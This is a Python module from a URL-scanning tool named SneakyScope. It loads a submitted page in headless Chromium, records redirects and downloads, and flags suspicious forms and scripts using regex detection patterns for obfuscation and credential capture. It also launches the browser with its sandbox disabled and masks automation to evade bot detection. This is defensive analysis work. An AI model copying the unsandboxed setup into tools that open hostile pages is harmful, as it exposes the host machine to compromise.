Files
SneakyScope/app/browser.py
2025-08-20 21:22:28 +00:00

401 lines
14 KiB
Python

import re
import uuid
import json
from pathlib import Path
from bs4 import BeautifulSoup
from datetime import datetime
from urllib.parse import urlparse
from typing import Dict, Any, Optional
from playwright.async_api import async_playwright, TimeoutError as PWTimeoutError
from flask import current_app # access the rule engine from app config
from app.utils.io_helpers import safe_write
from .enrichment import enrich_url
def get_rule_engine():
"""
Retrieve the rules engine instance from the Flask application config.
Returns:
RuleEngine or None: The engine if available, or None if not configured.
"""
try:
# current_app is only available during an active request context
engine = current_app.config.get("RULE_ENGINE")
return engine
except Exception:
# If called outside a Flask request context, fail gracefully
return None
def run_rule_checks(text, category):
"""
Run all rules for a given category against the provided text.
Args:
text (str): The content to test (e.g., form snippet, inline JS).
category (str): The rule category to run (e.g., 'form' or 'script').
Returns:
dict: {
"checks": [ { "rule": str, "category": str, "matched": bool, "reason": Optional[str] }, ... ],
"summary": { "matched_count": int, "total_rules": int }
}
"""
result = {
"checks": [],
"summary": {
"matched_count": 0,
"total_rules": 0
}
}
engine = get_rule_engine()
if engine is None:
# No engine configured; return empty but well-formed structure
return result
try:
# Run engine rules for the specified category
check_results = engine.run_all(text, category=category)
# Normalize results into the expected structure
total = 0
matched = 0
for item in check_results:
# item is expected to contain: rule, category, matched, reason (optional)
total = total + 1
if bool(item.get("matched")):
matched = matched + 1
normalized = {
"rule": item.get("rule"),
"category": item.get("category"),
"matched": bool(item.get("matched")),
"reason": item.get("reason")
}
result["checks"].append(normalized)
result["summary"]["matched_count"] = matched
result["summary"]["total_rules"] = total
except Exception as e:
# If anything goes wrong, keep structure and add a fake failure note
result["checks"].append({
"rule": "engine_error",
"category": category,
"matched": False,
"reason": f"Rule engine error: {e}"
})
result["summary"]["matched_count"] = 0
result["summary"]["total_rules"] = 0
return result
def analyze_forms(html: str, base_url: str):
"""
Parse forms from the page HTML and apply heuristic flags and rule-based checks.
Args:
html (str): The full page HTML.
base_url (str): The final URL of the page (used for hostname comparisons).
Returns:
list[dict]: A list of form analysis dictionaries, each including:
- action, method, inputs
- flagged (bool), flag_reasons (list[str]), status (str)
- rule_checks: dict with "checks" (list) and "summary" (dict)
"""
soup = BeautifulSoup(html, "lxml")
forms_info = []
page_hostname = urlparse(base_url).hostname
for form in soup.find_all("form"):
action = form.get("action")
method = form.get("method", "get").lower()
# Build explicit inputs list
inputs = []
for inp in form.find_all("input"):
input_name = inp.get("name")
input_type = inp.get("type", "text")
inputs.append({
"name": input_name,
"type": input_type
})
flagged_reasons = []
# No action specified
if not action or str(action).strip() == "":
flagged_reasons.append("No action specified")
# External host
else:
try:
action_host = urlparse(action).hostname
if not str(action).startswith("/") and action_host != page_hostname:
flagged_reasons.append("Submits to a different host")
except Exception:
# If hostname parsing fails, skip this condition quietly
pass
# HTTP form on HTTPS page
try:
if urlparse(action).scheme == "http" and urlparse(base_url).scheme == "https":
flagged_reasons.append("Submits over insecure HTTP")
except Exception:
# If scheme parsing fails, ignore
pass
# Hidden password / suspicious hidden inputs
for hidden in form.find_all("input", type="hidden"):
name_value = hidden.get("name") or ""
if "password" in name_value.lower():
flagged_reasons.append("Hidden password field")
flagged = bool(flagged_reasons)
# Serialize a simple form snippet for the rules engine to analyze (category='form')
snippet_lines = []
snippet_lines.append(f"action={action}")
snippet_lines.append(f"method={method}")
snippet_lines.append("inputs=")
for item in inputs:
snippet_lines.append(f" - name={item.get('name')} type={item.get('type')}")
form_snippet = "\n".join(snippet_lines)
rule_checks = run_rule_checks(form_snippet, category="form")
forms_info.append({
"action": action,
"method": method,
"inputs": inputs,
"flagged": flagged,
"flag_reasons": flagged_reasons,
"status": "flagged" if flagged else "possibly safe",
"rule_checks": rule_checks
})
return forms_info
def analyze_scripts(html: str, base_url: str = "", engine=None) -> list[dict]:
"""
Analyze <script> elements using the RuleEngine (if provided) and
lightweight built-in heuristics. Only append a record when at least
one rule or heuristic matches, and always set a sensible 'type'.
Returns list of dicts like:
{
"type": "external" | "inline" | "unknown",
"src": "...", # for external
"content_snippet": "...", # for inline
"rules": [ { "name": "...", "description": "..." }, ... ],
"heuristics": [ "reason1", "reason2", ... ]
}
"""
soup = BeautifulSoup(html, "lxml")
results: list[dict] = []
import re
from urllib.parse import urlparse
# Benign MIME types we ignore entirely
benign_types = {"application/ld+json", "application/json"}
# Suspicious file extensions for external scripts
dangerous_ext = (".vbs", ".hta")
# Inline red flags
risky_inline_patterns = [
(re.compile(r"\beval\s*\(", re.IGNORECASE), "Uses eval()"),
(re.compile(r"\bnew\s+Function\s*\(", re.IGNORECASE), "Uses Function constructor"),
(re.compile(r"\bdocument\.write\s*\(", re.IGNORECASE), "Uses document.write()"),
(re.compile(r"\bActiveXObject\s*\(", re.IGNORECASE), "Uses ActiveXObject (IE-only)"),
(re.compile(r"\batob\s*\(", re.IGNORECASE), "Uses atob() (possible obfuscation)"),
(re.compile(r"\bunescape\s*\(", re.IGNORECASE), "Uses unescape() (legacy/obfuscation)"),
(re.compile(r"\bset(?:Timeout|Interval)\s*\(\s*['\"`].+['\"`]\s*,", re.IGNORECASE),
"String passed to setTimeout/setInterval"),
(re.compile(r"[\"']?0x[0-9a-fA-F]{16,}[\"']?", re.IGNORECASE),
"Contains long hex-like constants (possible obfuscation)"),
]
base_host = urlparse(base_url).hostname or ""
for script in soup.find_all("script"):
try:
src = (script.get("src") or "").strip()
s_type_attr = (script.get("type") or "").strip().lower()
# IMPORTANT: .string is often None; get_text() is reliable
inline_text = script.get_text(strip=True) or ""
# Skip benign structured data outright
if s_type_attr in benign_types:
continue
# ---- Build facts for the rules engine
facts = {
"script_type_attr": s_type_attr or None,
"has_src": bool(src),
"src": src or None,
"attrs": dict(script.attrs),
"inline_len": len(inline_text),
"inline_preview": inline_text[:200].replace("\n", " ") if inline_text else None,
"base_url": base_url or None,
"base_hostname": base_host or None,
"src_hostname": urlparse(src).hostname if src else None,
}
# ---- Evaluate rules engine (using name/description)
engine_matches: list[dict] = []
if engine is not None:
try:
if hasattr(engine, "evaluate_script"):
matches = engine.evaluate_script(facts)
elif hasattr(engine, "evaluate"):
matches = engine.evaluate(facts)
else:
matches = []
if isinstance(matches, list):
for m in matches:
if isinstance(m, dict) and "name" in m:
engine_matches.append({
"name": m["name"],
"description": m.get("description", "")
})
elif isinstance(m, str):
engine_matches.append({"name": m, "description": ""})
except Exception as e:
engine_matches.append({"name": "Rules Engine Error", "description": str(e)})
# ---- Built-in heuristics
heuristics: list[str] = []
if src:
# Unusual URL schemes for script sources
if src.startswith(("data:", "blob:")):
heuristics.append("Script src uses data:/blob: URL")
# Dangerous extensions
for ext in dangerous_ext:
if src.lower().endswith(ext):
heuristics.append(f"External script with dangerous extension ({ext.lstrip('.')})")
break
# Third-party host hint
src_host = facts.get("src_hostname") or ""
if base_host and src_host and src_host != base_host:
heuristics.append(f"Third-party host: {src_host}")
else:
if inline_text:
for pat, why in risky_inline_patterns:
if pat.search(inline_text):
heuristics.append(why)
# ---- Only append when something matched; always set type
if engine_matches or heuristics:
record: dict = {}
if src:
record["type"] = "external"
record["src"] = src
elif inline_text:
record["type"] = "inline"
record["content_snippet"] = facts.get("inline_preview")
else:
record["type"] = "unknown"
if engine_matches:
record["rules"] = engine_matches
if heuristics:
record["heuristics"] = heuristics
results.append(record)
except Exception as e:
# Never let a single broken <script> kill the whole analysis
results.append({
"type": "unknown",
"heuristics": [f"Script analysis error: {e}"]
})
return results
async def fetch_page_artifacts(url: str, storage_dir: Path, engine=None) -> Dict[str, Any]:
"""
Fetch page artifacts and save them in a UUID-based directory.
Args:
url (str): URL to analyze.
storage_dir (Path): Base /data path.
engine: Optional rules engine instance (from app.config["RULE_ENGINE"]).
"""
run_uuid = str(uuid.uuid4())
run_dir = storage_dir / run_uuid
run_dir.mkdir(parents=True, exist_ok=True)
screenshot_path = run_dir / "screenshot.png"
source_path = run_dir / "source.txt"
results_path = run_dir / "results.json"
redirects = []
downloads = []
scripts = []
async with async_playwright() as pw:
browser = await pw.chromium.launch(
headless=True,
args=["--no-sandbox", "--disable-dev-shm-usage", "--disable-blink-features=AutomationControlled"]
)
context = await browser.new_context(
viewport={"width": 1920, "height": 1080},
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36",
java_script_enabled=True,
locale="en-US"
)
page = await context.new_page()
# Event handlers
page.on("response", lambda resp: redirects.append({"status": resp.status, "url": resp.url}) if 300 <= resp.status <= 399 else None)
page.on("download", lambda d: downloads.append({"url": d.url, "suggested_filename": d.suggested_filename}))
page.on("request", lambda r: scripts.append(r.url) if r.url.endswith((".js", ".vbs", ".hta")) else None)
try:
await page.goto(url, wait_until="networkidle", timeout=60000)
final_url = page.url
await page.screenshot(path=str(screenshot_path), full_page=True)
html = await page.content()
safe_write(source_path, html)
except PWTimeoutError:
final_url = page.url
safe_write(source_path, "Page did not fully load (timeout)")
await page.screenshot(path=str(screenshot_path), full_page=True)
await context.close()
await browser.close()
html_content = source_path.read_text(encoding="utf-8")
forms_info = analyze_forms(html_content, final_url)
suspicious_scripts = analyze_scripts(html_content, base_url=final_url, engine=engine)
enrichment = enrich_url(url)
result = {
"uuid": run_uuid,
"submitted_url": url,
"final_url": final_url,
"redirects": redirects,
"downloads": downloads,
"scripts": scripts,
"forms": forms_info,
"suspicious_scripts": suspicious_scripts,
"enrichment": enrichment
}
safe_write(results_path, json.dumps(result, indent=2))
return result